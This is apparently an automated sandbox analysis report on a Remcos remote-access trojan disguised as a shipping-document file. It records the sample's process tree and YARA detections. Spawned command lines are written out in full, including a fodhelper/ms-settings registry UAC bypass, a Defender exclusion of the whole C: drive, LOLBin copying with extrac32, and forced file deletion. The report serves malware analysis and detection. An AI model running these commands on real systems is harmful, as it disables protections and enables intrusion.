Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00446690	37_2_00446690
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0044A730	37_2_0044A730
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_004398D8	37_2_004398D8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_004498E0	37_2_004498E0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0044A886	37_2_0044A886
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0043DA09	37_2_0043DA09
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00438D5E	37_2_00438D5E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00449ED0	37_2_00449ED0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0041FE83	37_2_0041FE83
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00430F54	37_2_00430F54

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\glrkszlG.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 028B7CC8 appears 43 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 27974E10 appears 54 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 028A480C appears 606 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 028A6650 appears 37 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 028A46A4 appears 152 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 00416760 appears 69 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF70CC96D1C appears 36 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF70CC83448 appears 108 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF70CC8498C appears 60 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF70CC8081C appears 54 times
Source: C:\Users\Public\ger.exe	Code function: String function: 00007FF7E0A3D3D0 appears 56 times

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.4114575191.00000000279AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@67/28@3/4

Source: C:\Users\Public\alpha.exe

Code function: 5_2_00007FF70CC732B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,

5_2_00007FF70CC732B0

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27957952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		0_2_27957952
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A33F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,		16_2_00007FF7E0A33F5C

Source: C:\Users\Public\alpha.exe

Code function: 5_2_00007FF70CC9FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,

5_2_00007FF70CC9FB54

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2794F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

0_2_2794F474

Source: C:\Windows \System32\per.exe

Code function: 17_2_00007FF6FEF92850 CoInitializeEx,CoCreateInstance,WindowsGetStringRawBuffer,

17_2_00007FF6FEF92850

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2795B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

0_2_2795B4A8

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2795AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,

0_2_2795AC78

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Users\Public\xkn.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Mutant created: \Sessions\1\BaseNamedObjects\CorelDraw-OW5ET7
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03

Source: C:\Users\Public\Libraries\glrkszlG.pif

File created: C:\Users\user\AppData\Local\Temp\18A2.tmp

Jump to behavior

Source: C:\Users\Public\Libraries\glrkszlG.pif

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

System information queried: HandleInformation

Source: C:\Windows\System32\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")

Source: C:\Users\Public\Libraries\glrkszlG.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000025.00000002.1832307600.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000003.1864218322.000000000092B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	ReversingLabs: Detection: 28%
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Virustotal: Detection: 27%

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

File read: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Jump to behavior

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe "C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\Public\Libraries\glrkszlG.pif C:\Users\Public\Libraries\glrkszlG.pif
Source: C:\Users\Public\Libraries\glrkszlG.pif	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\\Users\\Public\\Libraries\\Glzskrlg.PIF
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: unknown	Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\agyqwjporhwhb"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\cidbxbaqfqomdosx"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\mcrtxutjtygzocojvhg"
Source: unknown	Process created: C:\Users\Public\Libraries\Glzskrlg.PIF "C:\Users\Public\Libraries\Glzskrlg.PIF"
